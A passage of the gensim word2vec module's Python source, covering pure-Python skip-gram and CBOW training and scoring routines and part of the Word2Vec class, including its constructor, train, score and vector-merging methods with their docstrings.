Called internally from :meth:`~gensim.models.word2vec.Word2Vec.train`.
Warnings
--------
This is the non-optimized, pure Python version. If you have a C compiler, Gensim
will use an optimized code path from :mod:`gensim.models.word2vec_inner` instead.
Parameters
----------
model : :class:`~gensim.models.word2vec.Word2Vec`
The Word2Vec model instance to train.
sentences : iterable of list of str
The corpus used to train the model.
alpha : float
The learning rate.
work : object, optional
Unused.
neu1 : object, optional
Unused.
compute_loss : bool, optional
Whether or not the training loss should be computed in this batch.
Returns
-------
int
Number of words in the vocabulary actually used for training (words that were in the vocabulary
and were not discarded by frequent-word downsampling, i.e. the `sample` parameter).
"""
result = 0
for sentence in sentences:
word_vocabs = [
model.wv.vocab[w] for w in sentence if w in model.wv.vocab
and model.wv.vocab[w].sample_int > model.random.rand() * 2 ** 32
]
for pos, word in enumerate(word_vocabs):
reduced_window = model.random.randint(model.window) # `b` in the original word2vec code
start = max(0, pos - model.window + reduced_window)
window_pos = enumerate(word_vocabs[start:(pos + model.window + 1 - reduced_window)], start)
word2_indices = [word2.index for pos2, word2 in window_pos if (word2 is not None and pos2 != pos)]
l1 = np_sum(model.wv.syn0[word2_indices], axis=0) # 1 x vector_size
if word2_indices and model.cbow_mean:
l1 /= len(word2_indices)
train_cbow_pair(model, word, word2_indices, l1, alpha, compute_loss=compute_loss)
result += len(word_vocabs)
return result
def score_sentence_sg(model, sentence, work=None):
"""Obtain likelihood score for a single sentence in a fitted skip-gram representation.
Notes
-----
This is the non-optimized, pure Python version. If you have a C compiler, Gensim
will use an optimized code path from :mod:`gensim.models.word2vec_inner` instead.
Parameters
----------
model : :class:`~gensim.models.word2vec.Word2Vec`
The trained model. It **MUST** have been trained using hierarchical softmax and the skip-gram algorithm.
sentence : list of str
The words comprising the sentence to be scored.
work : object, optional
Unused. For interface compatibility only.
Returns
-------
float
The probability assigned to this sentence by the Skip-Gram model.
"""
log_prob_sentence = 0.0
if model.negative:
raise RuntimeError("scoring is only available for HS=True")
word_vocabs = [model.wv.vocab[w] for w in sentence if w in model.wv.vocab]
for pos, word in enumerate(word_vocabs):
if word is None:
continue # OOV word in the input sentence => skip
# now go over all words from the window, predicting each one in turn
start = max(0, pos - model.window)
for pos2, word2 in enumerate(word_vocabs[start: pos + model.window + 1], start):
# don't train on OOV words and on the `word` itself
if word2 is not None and pos2 != pos:
log_prob_sentence += score_sg_pair(model, word, word2)
return log_prob_sentence
def score_sentence_cbow(model, sentence, work=None, neu1=None):
"""Obtain likelihood score for a single sentence in a fitted CBOW representation.
Notes
-----
This is the non-optimized, pure Python version. If you have a C compiler, Gensim
will use an optimized code path from :mod:`gensim.models.word2vec_inner` instead.
Parameters
----------
model : :class:`~gensim.models.word2vec.Word2Vec`
The trained model. It **MUST** have been trained using hierarchical softmax and the CBOW algorithm.
sentence : list of str
The words comprising the sentence to be scored.
work : object, optional
Unused. For interface compatibility only.
neu1 : object, optional
Unused. For interface compatibility only.
Returns
-------
float
The probability assigned to this sentence by the CBOW model.
"""
log_prob_sentence = 0.0
if model.negative:
raise RuntimeError("scoring is only available for HS=True")
word_vocabs = [model.wv.vocab[w] for w in sentence if w in model.wv.vocab]
for pos, word in enumerate(word_vocabs):
if word is None:
continue # OOV word in the input sentence => skip
start = max(0, pos - model.window)
window_pos = enumerate(word_vocabs[start:(pos + model.window + 1)], start)
word2_indices = [word2.index for pos2, word2 in window_pos if (word2 is not None and pos2 != pos)]
l1 = np_sum(model.wv.syn0[word2_indices], axis=0) # 1 x layer1_size
if word2_indices and model.cbow_mean:
l1 /= len(word2_indices)
log_prob_sentence += score_cbow_pair(model, word, l1)
return log_prob_sentence
try:
from gensim.models.word2vec_corpusfile import train_epoch_sg, train_epoch_cbow, CORPUSFILE_VERSION
except ImportError:
# file-based word2vec is not supported
CORPUSFILE_VERSION = -1
def train_epoch_sg(model, corpus_file, offset, _cython_vocab, _cur_epoch, _expected_examples, _expected_words,
_work, _neu1, compute_loss):
raise RuntimeError("Training with corpus_file argument is not supported")
def train_epoch_cbow(model, corpus_file, offset, _cython_vocab, _cur_epoch, _expected_examples, _expected_words,
_work, _neu1, compute_loss):
raise RuntimeError("Training with corpus_file argument is not supported")
def train_sg_pair(model, word, context_index, alpha, learn_vectors=True, learn_hidden=True,
context_vectors=None, context_locks=None, compute_loss=False, is_ft=False):
"""Train the passed model instance on a word and its context, using the Skip-gram algorithm.
Parameters
----------
model : :class:`~gensim.models.word2vec.Word2Vec`
The model to be trained.
word : str
The label (predicted) word.
context_index : list of int
The vocabulary indices of the words in the context.
alpha : float
Learning rate.
learn_vectors : bool, optional
Whether the vectors should be updated.
learn_hidden : bool, optional
Whether the weights of the hidden layer should be updated.
context_vectors : list of list of float, optional
Vector representations of the words in the context. If None, these will be retrieved from the model.
context_locks : list of float, optional
The lock factors for each word in the context.
compute_loss : bool, optional
Whether or not the training loss should be computed.
is_ft : bool, optional
If True, weights will be computed using `model.wv.syn0_vocab` and `model.wv.syn0_ngrams`
instead of `model.wv.syn0`.
Returns
-------
numpy.ndarray
Error vector to be back-propagated.
"""
if context_vectors is None:
if is_ft:
context_vectors_vocab = model.wv.syn0_vocab
context_vectors_ngrams = model.wv.syn0_ngrams
else:
context_vectors = model.wv.syn0
if context_locks is None:
if is_ft:
context_locks_vocab = model.syn0_vocab_lockf
context_locks_ngrams = model.syn0_ngrams_lockf
else:
context_locks = model.syn0_lockf
if word not in model.wv.vocab:
return
predict_word = model.wv.vocab[word] # target word (NN output)
if is_ft:
l1_vocab = context_vectors_vocab[context_index[0]]
l1_ngrams = np_sum(context_vectors_ngrams[context_index[1:]], axis=0)
if context_index:
l1 = np_sum([l1_vocab, l1_ngrams], axis=0) / len(context_index)
else:
l1 = context_vectors[context_index] # input word (NN input/projection layer)
lock_factor = context_locks[context_index]
neu1e = zeros(l1.shape)
if model.hs:
# work on the entire tree at once, to push as much work into numpy's C routines as possible (performance)
l2a = deepcopy(model.syn1[predict_word.point]) # 2d matrix, codelen x layer1_size
prod_term = dot(l1, l2a.T)
fa = expit(prod_term) # propagate hidden -> output
ga = (1 - predict_word.code - fa) * alpha # vector of error gradients multiplied by the learning rate
if learn_hidden:
model.syn1[predict_word.point] += outer(ga, l1) # learn hidden -> output
neu1e += dot(ga, l2a) # save error
# loss component corresponding to hierarchical softmax
if compute_loss:
sgn = (-1.0) ** predict_word.code # `ch` function, 0 -> 1, 1 -> -1
lprob = -log(expit(-sgn * prod_term))
model.running_training_loss += sum(lprob)
if model.negative:
# use this word (label = 1) + `negative` other random words not from this sentence (label = 0)
word_indices = [predict_word.index]
while len(word_indices) < model.negative + 1:
w = model.cum_table.searchsorted(model.random.randint(model.cum_table[-1]))
if w != predict_word.index:
word_indices.append(w)
l2b = model.syn1neg[word_indices] # 2d matrix, k+1 x layer1_size
prod_term = dot(l1, l2b.T)
fb = expit(prod_term) # propagate hidden -> output
gb = (model.neg_labels - fb) * alpha # vector of error gradients multiplied by the learning rate
if learn_hidden:
model.syn1neg[word_indices] += outer(gb, l1) # learn hidden -> output
neu1e += dot(gb, l2b) # save error
# loss component corresponding to negative sampling
if compute_loss:
model.running_training_loss -= sum(log(expit(-1 * prod_term[1:]))) # for the sampled words
model.running_training_loss -= log(expit(prod_term[0])) # for the output word
if learn_vectors:
if is_ft:
model.wv.syn0_vocab[context_index[0]] += neu1e * context_locks_vocab[context_index[0]]
for i in context_index[1:]:
model.wv.syn0_ngrams[i] += neu1e * context_locks_ngrams[i]
else:
l1 += neu1e * lock_factor # learn input -> hidden (mutates model.wv.syn0[word2.index], if that is l1)
return neu1e
def train_cbow_pair(model, word, input_word_indices, l1, alpha, learn_vectors=True, learn_hidden=True,
compute_loss=False, context_vectors=None, context_locks=None, is_ft=False):
"""Train the passed model instance on a word and its context, using the CBOW algorithm.
Parameters
----------
model : :class:`~gensim.models.word2vec.Word2Vec`
The model to be trained.
word : str
The label (predicted) word.
input_word_indices : list of int
The vocabulary indices of the words in the context.
l1 : list of float
Vector representation of the label word.
alpha : float
Learning rate.
learn_vectors : bool, optional
Whether the vectors should be updated.
learn_hidden : bool, optional
Whether the weights of the hidden layer should be updated.
compute_loss : bool, optional
Whether or not the training loss should be computed.
context_vectors : list of list of float, optional
Vector representations of the words in the context. If None, these will be retrieved from the model.
context_locks : list of float, optional
The lock factors for each word in the context.
is_ft : bool, optional
If True, weights will be computed using `model.wv.syn0_vocab` and `model.wv.syn0_ngrams`
instead of `model.wv.syn0`.
Returns
-------
numpy.ndarray
Error vector to be back-propagated.
"""
if context_vectors is None:
if is_ft:
context_vectors_vocab = model.wv.syn0_vocab
context_vectors_ngrams = model.wv.syn0_ngrams
else:
context_vectors = model.wv.syn0
if context_locks is None:
if is_ft:
context_locks_vocab = model.syn0_vocab_lockf
context_locks_ngrams = model.syn0_ngrams_lockf
else:
context_locks = model.syn0_lockf
neu1e = zeros(l1.shape)
if model.hs:
l2a = model.syn1[word.point] # 2d matrix, codelen x layer1_size
prod_term = dot(l1, l2a.T)
fa = expit(prod_term) # propagate hidden -> output
ga = (1. - word.code - fa) * alpha # vector of error gradients multiplied by the learning rate
if learn_hidden:
model.syn1[word.point] += outer(ga, l1) # learn hidden -> output
neu1e += dot(ga, l2a) # save error
# loss component corresponding to hierarchical softmax
if compute_loss:
sgn = (-1.0) ** word.code # `ch` function, 0 -> 1, 1 -> -1
model.running_training_loss += sum(-log(expit(-sgn * prod_term)))
if model.negative:
# use this word (label = 1) + `negative` other random words not from this sentence (label = 0)
word_indices = [word.index]
while len(word_indices) < model.negative + 1:
w = model.cum_table.searchsorted(model.random.randint(model.cum_table[-1]))
if w != word.index:
word_indices.append(w)
l2b = model.syn1neg[word_indices] # 2d matrix, k+1 x layer1_size
prod_term = dot(l1, l2b.T)
fb = expit(prod_term) # propagate hidden -> output
gb = (model.neg_labels - fb) * alpha # vector of error gradients multiplied by the learning rate
if learn_hidden:
model.syn1neg[word_indices] += outer(gb, l1) # learn hidden -> output
neu1e += dot(gb, l2b) # save error
# loss component corresponding to negative sampling
if compute_loss:
model.running_training_loss -= sum(log(expit(-1 * prod_term[1:]))) # for the sampled words
model.running_training_loss -= log(expit(prod_term[0])) # for the output word
if learn_vectors:
# learn input -> hidden, here for all words in the window separately
if is_ft:
if not model.cbow_mean and input_word_indices:
neu1e /= (len(input_word_indices[0]) + len(input_word_indices[1]))
for i in input_word_indices[0]:
context_vectors_vocab[i] += neu1e * context_locks_vocab[i]
for i in input_word_indices[1]:
context_vectors_ngrams[i] += neu1e * context_locks_ngrams[i]
else:
if not model.cbow_mean and input_word_indices:
neu1e /= len(input_word_indices)
for i in input_word_indices:
context_vectors[i] += neu1e * context_locks[i]
return neu1e
def score_sg_pair(model, word, word2):
"""Score the trained Skip-gram model on a pair of words.
Parameters
----------
model : :class:`~gensim.models.word2vec.Word2Vec`
The trained model.
word : :class:`~gensim.models.keyedvectors.Vocab`
Vocabulary representation of the first word.
word2 : :class:`~gensim.models.keyedvectors.Vocab`
Vocabulary representation of the second word.
Returns
-------
float
The log-probability of observing `word` given `word2`, under the model's hierarchical softmax output layer.
"""
l1 = model.wv.syn0[word2.index]
l2a = deepcopy(model.syn1[word.point]) # 2d matrix, codelen x layer1_size
sgn = (-1.0) ** word.code # `ch` function, 0 -> 1, 1 -> -1
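# note: -logaddexp(0, -z) == log(expit(z)), a numerically stable log-sigmoid of the signed score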
lprob = -logaddexp(0, -sgn * dot(l1, l2a.T))
return sum(lprob)
def score_cbow_pair(model, word, l1):
"""Score the trained CBOW model on a pair of words.
Parameters
----------
model : :class:`~gensim.models.word2vec.Word2Vec`
The trained model.
word : :class:`~gensim.models.keyedvectors.Vocab`
Vocabulary representation of the first word.
l1 : list of float
Vector representation of the second word.
Returns
-------
float
The log-probability of observing `word` given the context projection `l1`, under the model's hierarchical softmax output layer.
"""
l2a = model.syn1[word.point] # 2d matrix, codelen x layer1_size
sgn = (-1.0) ** word.code # `ch` function, 0 -> 1, 1 -> -1
lprob = -logaddexp(0, -sgn * dot(l1, l2a.T))
return sum(lprob)
class Word2Vec(BaseWordEmbeddingsModel):
"""Train, use and evaluate neural networks described in https://code.google.com/p/word2vec/.
Once you're finished training a model (=no more updates, only querying)
store and use only the :class:`~gensim.models.keyedvectors.KeyedVectors` instance in `self.wv` to reduce memory.
The model can be stored/loaded via its :meth:`~gensim.models.word2vec.Word2Vec.save` and
:meth:`~gensim.models.word2vec.Word2Vec.load` methods.
The trained word vectors can also be stored/loaded from a format compatible with the
original word2vec implementation via `self.wv.save_word2vec_format`
and :meth:`gensim.models.keyedvectors.KeyedVectors.load_word2vec_format`.
Some important attributes are the following:
Attributes
----------
wv : :class:`~gensim.models.keyedvectors.Word2VecKeyedVectors`
This object essentially contains the mapping between words and embeddings. After training, it can be used
directly to query those embeddings in various ways. See the module level docstring for examples.
vocabulary : :class:`~gensim.models.word2vec.Word2VecVocab`
This object represents the vocabulary (sometimes called Dictionary in gensim) of the model.
Besides keeping track of all unique words, this object provides extra functionality, such as
constructing a Huffman tree (frequent words are closer to the root), or discarding extremely rare words.
trainables : :class:`~gensim.models.word2vec.Word2VecTrainables`
This object represents the inner shallow neural network used to train the embeddings. The semantics of the
network differ slightly in the two available training modes (CBOW or SG) but you can think of it as a NN with
a single projection and hidden layer which we train on the corpus. The weights are then used as our embeddings
(which means that the size of the hidden layer is equal to the number of features `self.size`).
"""
def __init__(self, sentences=None, corpus_file=None, size=100, alpha=0.025, window=5, min_count=5,
max_vocab_size=None, sample=1e-3, seed=1, workers=3, min_alpha=0.0001,
sg=0, hs=0, negative=5, ns_exponent=0.75, cbow_mean=1, hashfxn=hash, iter=5, null_word=0,
trim_rule=None, sorted_vocab=1, batch_words=MAX_WORDS_IN_BATCH, compute_loss=False, callbacks=(),
max_final_vocab=None):
"""
Parameters
----------
sentences : iterable of iterables, optional
The `sentences` iterable can be simply a list of lists of tokens, but for larger corpora,
consider an iterable that streams the sentences directly from disk/network.
See :class:`~gensim.models.word2vec.BrownCorpus`, :class:`~gensim.models.word2vec.Text8Corpus`
or :class:`~gensim.models.word2vec.LineSentence` in :mod:`~gensim.models.word2vec` module for such examples.
See also the `tutorial on data streaming in Python
<https://rare-technologies.com/data-streaming-in-python-generators-iterators-iterables/>`_.
If you don't supply `sentences`, the model is left uninitialized -- use if you plan to initialize it
in some other way.
corpus_file : str, optional
Path to a corpus file in :class:`~gensim.models.word2vec.LineSentence` format.
You may use this argument instead of `sentences` to get performance boost. Only one of `sentences` or
`corpus_file` arguments need to be passed (or none of them, in that case, the model is left uninitialized).
size : int, optional
Dimensionality of the word vectors.
window : int, optional
Maximum distance between the current and predicted word within a sentence.
min_count : int, optional
Ignores all words with total frequency lower than this.
workers : int, optional
Use this many worker threads to train the model (faster training with multicore machines).
sg : {0, 1}, optional
Training algorithm: 1 for skip-gram; otherwise CBOW.
hs : {0, 1}, optional
If 1, hierarchical softmax will be used for model training.
If 0, and `negative` is non-zero, negative sampling will be used.
negative : int, optional
If > 0, negative sampling will be used, the int for negative specifies how many "noise words"
should be drawn (usually between 5-20).
If set to 0, no negative sampling is used.
ns_exponent : float, optional
The exponent used to shape the negative sampling distribution. A value of 1.0 samples exactly in proportion
to the frequencies, 0.0 samples all words equally, while a negative value samples low-frequency words more
than high-frequency words. The popular default value of 0.75 was chosen by the original Word2Vec paper.
More recently, in https://arxiv.org/abs/1804.04212, Caselles-Dupré, Lesaint, & Royo-Letelier suggest that
other values may perform better for recommendation applications.
cbow_mean : {0, 1}, optional
If 0, use the sum of the context word vectors. If 1, use the mean, only applies when cbow is used.
alpha : float, optional
The initial learning rate.
min_alpha : float, optional
Learning rate will linearly drop to `min_alpha` as training progresses.
seed : int, optional
Seed for the random number generator. Initial vectors for each word are seeded with a hash of
the concatenation of word + `str(seed)`. Note that for a fully deterministically-reproducible run,
you must also limit the model to a single worker thread (`workers=1`), to eliminate ordering jitter
from OS thread scheduling. (In Python 3, reproducibility between interpreter launches also requires
use of the `PYTHONHASHSEED` environment variable to control hash randomization).
max_vocab_size : int, optional
Limits the RAM during vocabulary building; if there are more unique
words than this, then prune the infrequent ones. Every 10 million word types need about 1GB of RAM.
Set to `None` for no limit.
max_final_vocab : int, optional
Limits the vocab to a target vocab size by automatically picking a matching min_count. If the specified
min_count is more than the calculated min_count, the specified min_count will be used.
Set to `None` if not required.
sample : float, optional
The threshold for configuring which higher-frequency words are randomly downsampled,
useful range is (0, 1e-5).
hashfxn : function, optional
Hash function to use to randomly initialize weights, for increased training reproducibility.
iter : int, optional
Number of iterations (epochs) over the corpus.
trim_rule : function, optional
Vocabulary trimming rule, specifies whether certain words should remain in the vocabulary,
be trimmed away, or handled using the default (discard if word count < min_count).
Can be None (min_count will be used, look to :func:`~gensim.utils.keep_vocab_item`),
or a callable that accepts parameters (word, count, min_count) and returns either
:attr:`gensim.utils.RULE_DISCARD`, :attr:`gensim.utils.RULE_KEEP` or :attr:`gensim.utils.RULE_DEFAULT`.
The rule, if given, is only used to prune vocabulary during build_vocab() and is not stored as part of the
model.
The input parameters are of the following types:
* `word` (str) - the word we are examining
* `count` (int) - the word's frequency count in the corpus
* `min_count` (int) - the minimum count threshold.
sorted_vocab : {0, 1}, optional
If 1, sort the vocabulary by descending frequency before assigning word indexes.
See :meth:`~gensim.models.word2vec.Word2VecVocab.sort_vocab()`.
batch_words : int, optional
Target size (in words) for batches of examples passed to worker threads (and
thus cython routines). (Larger batches will be passed if individual
texts are longer than 10000 words, but the standard cython code truncates to that maximum.)
compute_loss: bool, optional
If True, computes and stores loss value which can be retrieved using
:meth:`~gensim.models.word2vec.Word2Vec.get_latest_training_loss`.
callbacks : iterable of :class:`~gensim.models.callbacks.CallbackAny2Vec`, optional
Sequence of callbacks to be executed at specific stages during training.
Examples
--------
Initialize and train a :class:`~gensim.models.word2vec.Word2Vec` model
.. sourcecode:: pycon
>>> from gensim.models import Word2Vec
>>> sentences = [["cat", "say", "meow"], ["dog", "say", "woof"]]
>>> model = Word2Vec(sentences, min_count=1)
"""
self.max_final_vocab = max_final_vocab
self.callbacks = callbacks
self.load = call_on_class_only
self.wv = Word2VecKeyedVectors(size)
self.vocabulary = Word2VecVocab(
max_vocab_size=max_vocab_size, min_count=min_count, sample=sample, sorted_vocab=bool(sorted_vocab),
null_word=null_word, max_final_vocab=max_final_vocab, ns_exponent=ns_exponent)
self.trainables = Word2VecTrainables(seed=seed, vector_size=size, hashfxn=hashfxn)
super(Word2Vec, self).__init__(
sentences=sentences, corpus_file=corpus_file, workers=workers, vector_size=size, epochs=iter,
callbacks=callbacks, batch_words=batch_words, trim_rule=trim_rule, sg=sg, alpha=alpha, window=window,
seed=seed, hs=hs, negative=negative, cbow_mean=cbow_mean, min_alpha=min_alpha, compute_loss=compute_loss,
fast_version=FAST_VERSION)
def _do_train_epoch(self, corpus_file, thread_id, offset, cython_vocab, thread_private_mem, cur_epoch,
total_examples=None, total_words=None, **kwargs):
work, neu1 = thread_private_mem
if self.sg:
examples, tally, raw_tally = train_epoch_sg(self, corpus_file, offset, cython_vocab, cur_epoch,
total_examples, total_words, work, neu1, self.compute_loss)
else:
examples, tally, raw_tally = train_epoch_cbow(self, corpus_file, offset, cython_vocab, cur_epoch,
total_examples, total_words, work, neu1, self.compute_loss)
return examples, tally, raw_tally
def _do_train_job(self, sentences, alpha, inits):
"""Train the model on a single batch of sentences.
Parameters
----------
sentences : iterable of list of str
Corpus chunk to be used in this training batch.
alpha : float
The learning rate used in this batch.
inits : (np.ndarray, np.ndarray)
Each worker thread's private working memory.
Returns
-------
(int, int)
2-tuple (effective word count after ignoring unknown words and sentence length trimming, total word count).
"""
work, neu1 = inits
tally = 0
if self.sg:
tally += train_batch_sg(self, sentences, alpha, work, self.compute_loss)
else:
tally += train_batch_cbow(self, sentences, alpha, work, neu1, self.compute_loss)
return tally, self._raw_word_count(sentences)
def _clear_post_train(self):
"""Remove all L2-normalized word vectors from the model."""
self.wv.vectors_norm = None
def _set_train_params(self, **kwargs):
if 'compute_loss' in kwargs:
self.compute_loss = kwargs['compute_loss']
self.running_training_loss = 0
def train(self, sentences=None, corpus_file=None, total_examples=None, total_words=None,
epochs=None, start_alpha=None, end_alpha=None, word_count=0,
queue_factor=2, report_delay=1.0, compute_loss=False, callbacks=()):
"""Update the model's neural weights from a sequence of sentences.
Notes
-----
To support linear learning-rate decay from (initial) `alpha` to `min_alpha`, and accurate
progress-percentage logging, either `total_examples` (count of sentences) or `total_words` (count of
raw words in sentences) **MUST** be provided. If `sentences` is the same corpus
that was provided to :meth:`~gensim.models.word2vec.Word2Vec.build_vocab` earlier,
you can simply use `total_examples=self.corpus_count`.
Warnings
--------
To avoid common mistakes around the model's ability to do multiple training passes itself, an
explicit `epochs` argument **MUST** be provided. In the common and recommended case
where :meth:`~gensim.models.word2vec.Word2Vec.train` is only called once, you can set `epochs=self.iter`.
Parameters
----------
sentences : iterable of list of str
The `sentences` iterable can be simply a list of lists of tokens, but for larger corpora,
consider an iterable that streams the sentences directly from disk/network.
See :class:`~gensim.models.word2vec.BrownCorpus`, :class:`~gensim.models.word2vec.Text8Corpus`
or :class:`~gensim.models.word2vec.LineSentence` in :mod:`~gensim.models.word2vec` module for such examples.
See also the `tutorial on data streaming in Python
<https://rare-technologies.com/data-streaming-in-python-generators-iterators-iterables/>`_.
corpus_file : str, optional
Path to a corpus file in :class:`~gensim.models.word2vec.LineSentence` format.
You may use this argument instead of `sentences` to get performance boost. Only one of `sentences` or
`corpus_file` arguments need to be passed (not both of them).
total_examples : int
Count of sentences.
total_words : int
Count of raw words in sentences.
epochs : int
Number of iterations (epochs) over the corpus.
start_alpha : float, optional
Initial learning rate. If supplied, replaces the starting `alpha` from the constructor,
for this one call to `train()`.
Use only if making multiple calls to `train()`, when you want to manage the alpha learning-rate yourself
(not recommended).
end_alpha : float, optional
Final learning rate. Drops linearly from `start_alpha`.
If supplied, this replaces the final `min_alpha` from the constructor, for this one call to `train()`.
Use only if making multiple calls to `train()`, when you want to manage the alpha learning-rate yourself
(not recommended).
word_count : int, optional
Count of words already trained. Set this to 0 for the usual
case of training on all words in sentences.
queue_factor : int, optional
Multiplier for size of queue (number of workers * queue_factor).
report_delay : float, optional
Seconds to wait before reporting progress.
compute_loss: bool, optional
If True, computes and stores loss value which can be retrieved using
:meth:`~gensim.models.word2vec.Word2Vec.get_latest_training_loss`.
callbacks : iterable of :class:`~gensim.models.callbacks.CallbackAny2Vec`, optional
Sequence of callbacks to be executed at specific stages during training.
Examples
--------
.. sourcecode:: pycon
>>> from gensim.models import Word2Vec
>>> sentences = [["cat", "say", "meow"], ["dog", "say", "woof"]]
>>>
>>> model = Word2Vec(min_count=1)
>>> model.build_vocab(sentences) # prepare the model vocabulary
>>> model.train(sentences, total_examples=model.corpus_count, epochs=model.iter) # train word vectors
(1, 30)
"""
return super(Word2Vec, self).train(
sentences=sentences, corpus_file=corpus_file, total_examples=total_examples, total_words=total_words,
epochs=epochs, start_alpha=start_alpha, end_alpha=end_alpha, word_count=word_count,
queue_factor=queue_factor, report_delay=report_delay, compute_loss=compute_loss, callbacks=callbacks)
def score(self, sentences, total_sentences=int(1e6), chunksize=100, queue_factor=2, report_delay=1):
"""Score the log probability for a sequence of sentences.
This does not change the fitted model in any way (see :meth:`~gensim.models.word2vec.Word2Vec.train` for that).
Gensim has currently only implemented score for the hierarchical softmax scheme,
so you need to have run word2vec with `hs=1` and `negative=0` for this to work.
Note that you should specify `total_sentences`; you'll run into problems if you ask to
score more than this number of sentences but it is inefficient to set the value too high.
See the `article by Matt Taddy: "Document Classification by Inversion of Distributed Language Representations"
<https://arxiv.org/pdf/1504.07295.pdf>`_ and the
`gensim demo <https://github.com/piskvorky/gensim/blob/develop/docs/notebooks/deepir.ipynb>`_ for examples of
how to use such scores in document classification.
Parameters
----------
sentences : iterable of list of str
The `sentences` iterable can be simply a list of lists of tokens, but for larger corpora,
consider an iterable that streams the sentences directly from disk/network.
See :class:`~gensim.models.word2vec.BrownCorpus`, :class:`~gensim.models.word2vec.Text8Corpus`
or :class:`~gensim.models.word2vec.LineSentence` in :mod:`~gensim.models.word2vec` module for such examples.
total_sentences : int, optional
Count of sentences.
chunksize : int, optional
Chunksize of jobs (number of sentences per job).
queue_factor : int, optional
Multiplier for size of queue (number of workers * queue_factor).
report_delay : float, optional
Seconds to wait before reporting progress.
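Examples
--------
A minimal sketch (scoring is only implemented for hierarchical softmax, so the model must be trained
with `hs=1, negative=0`):
.. sourcecode:: pycon
>>> from gensim.models import Word2Vec
>>> sentences = [["cat", "say", "meow"], ["dog", "say", "woof"]]
>>> model = Word2Vec(sentences, min_count=1, hs=1, negative=0)
>>> log_probs = model.score([["cat", "say", "woof"]], total_sentences=1)  # array of per-sentence log probabilities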
"""
if FAST_VERSION < 0:
warnings.warn(
"C extension compilation failed, scoring will be slow. "
"Install a C compiler and reinstall gensim for fastness."
)
logger.info(
"scoring sentences with %i workers on %i vocabulary and %i features, "
"using sg=%s hs=%s sample=%s and negative=%s",
self.workers, len(self.wv.vocab), self.trainables.layer1_size, self.sg, self.hs,
self.vocabulary.sample, self.negative
)
if not self.wv.vocab:
raise RuntimeError("you must first build vocabulary before scoring new data")
if not self.hs:
raise RuntimeError(
"We have currently only implemented score for the hierarchical softmax scheme, "
"so you need to have run word2vec with hs=1 and negative=0 for this to work."
)
def worker_loop():
"""Compute log probability for each sentence, lifting lists of sentences from the jobs queue."""
work = zeros(1, dtype=REAL) # for sg hs, we actually only need one memory loc (running sum)
neu1 = matutils.zeros_aligned(self.trainables.layer1_size, dtype=REAL)
while True:
job = job_queue.get()
if job is None: # signal to finish
break
ns = 0
for sentence_id, sentence in job:
if sentence_id >= total_sentences:
break
if self.sg:
score = score_sentence_sg(self, sentence, work)
else:
score = score_sentence_cbow(self, sentence, work, neu1)
sentence_scores[sentence_id] = score
ns += 1
progress_queue.put(ns) # report progress
start, next_report = default_timer(), 1.0
# buffer ahead only a limited number of jobs; this is the reason we can't simply use ThreadPool :(
job_queue = Queue(maxsize=queue_factor * self.workers)
progress_queue = Queue(maxsize=(queue_factor + 1) * self.workers)
workers = [threading.Thread(target=worker_loop) for _ in range(self.workers)]
for thread in workers:
thread.daemon = True # make interrupting the process with ctrl+c easier
thread.start()
sentence_count = 0
sentence_scores = matutils.zeros_aligned(total_sentences, dtype=REAL)
push_done = False
done_jobs = 0
jobs_source = enumerate(utils.grouper(enumerate(sentences), chunksize))
# fill jobs queue with (id, sentence) job items
while True:
try:
job_no, items = next(jobs_source)
if (job_no - 1) * chunksize > total_sentences:
logger.warning(
"terminating after %i sentences (set higher total_sentences if you want more).",
total_sentences
)
job_no -= 1
raise StopIteration()
logger.debug("putting job #%i in the queue", job_no)
job_queue.put(items)
except StopIteration:
logger.info("reached end of input; waiting to finish %i outstanding jobs", job_no - done_jobs + 1)
for _ in range(self.workers):
job_queue.put(None) # give the workers heads up that they can finish -- no more work!
push_done = True
try:
while done_jobs < (job_no + 1) or not push_done:
ns = progress_queue.get(push_done) # only block after all jobs pushed
sentence_count += ns
done_jobs += 1
elapsed = default_timer() - start
if elapsed >= next_report:
logger.info(
"PROGRESS: at %.2f%% sentences, %.0f sentences/s",
100.0 * sentence_count, sentence_count / elapsed
)
next_report = elapsed + report_delay # don't flood log, wait report_delay seconds
else:
# loop ended by job count; really done
break
except Empty:
pass # already out of loop; continue to next push
elapsed = default_timer() - start
self.clear_sims()
logger.info(
"scoring %i sentences took %.1fs, %.0f sentences/s",
sentence_count, elapsed, sentence_count / elapsed
)
return sentence_scores[:sentence_count]
def clear_sims(self):
"""Remove all L2-normalized word vectors from the model, to free up memory.
You can recompute them later again using the :meth:`~gensim.models.word2vec.Word2Vec.init_sims` method.
"""
self.wv.vectors_norm = None
def intersect_word2vec_format(self, fname, lockf=0.0, binary=False, encoding='utf8', unicode_errors='strict'):
"""Merge in an input-hidden weight matrix loaded from the original C word2vec-tool format,
where it intersects with the current vocabulary.
No words are added to the existing vocabulary, but intersecting words adopt the file's weights, and
non-intersecting words are left alone.
Parameters
----------
fname : str
The file path to load the vectors from.
lockf : float, optional
Lock-factor value to be set for any imported word-vectors; the
default value of 0.0 prevents further updating of the vector during subsequent
training. Use 1.0 to allow further training updates of merged vectors.
binary : bool, optional
If True, `fname` is in the binary word2vec C format.
encoding : str, optional
Encoding of `text` for `unicode` function (python2 only).
unicode_errors : str, optional
Error handling behaviour, used as parameter for `unicode` function (python2 only).
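Examples
--------
A minimal sketch (assuming `extra_vectors.bin` is a hypothetical word2vec-C-format binary file whose
vector size matches `self.wv.vector_size`):
.. sourcecode:: pycon
>>> model.intersect_word2vec_format("extra_vectors.bin", lockf=0.0, binary=True)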
"""
overlap_count = 0
logger.info("loading projection weights from %s", fname)
with utils.smart_open(fname) as fin:
header = utils.to_unicode(fin.readline(), encoding=encoding)
vocab_size, vector_size = (int(x) for x in header.split()) # throws for invalid file format
if not vector_size == self.wv.vector_size:
raise ValueError("incompatible vector size %d in file %s" % (vector_size, fname))
# TOCONSIDER: maybe mismatched vectors still useful enough to merge (truncating/padding)?
if binary:
binary_len = dtype(REAL).itemsize * vector_size
for _ in range(vocab_size):
# mixed text and binary: read text first, then binary
word = []
while True:
ch = fin.read(1)
if ch == b' ':
break
if ch != b'\n': # ignore newlines in front of words (some binary files have)
word.append(ch)
word = utils.to_unicode(b''.join(word), encoding=encoding, errors=unicode_errors)
weights = fromstring(fin.read(binary_len), dtype=REAL)
if word in self.wv.vocab:
overlap_count += 1
self.wv.vectors[self.wv.vocab[word].index] = weights
self.trainables.vectors_lockf[self.wv.vocab[word].index] = lockf # lock-factor: 0.0=no changes
else:
for line_no, line in enumerate(fin):
parts = utils.to_unicode(line.rstrip(), encoding=encoding, errors=unicode_errors).split(" ")
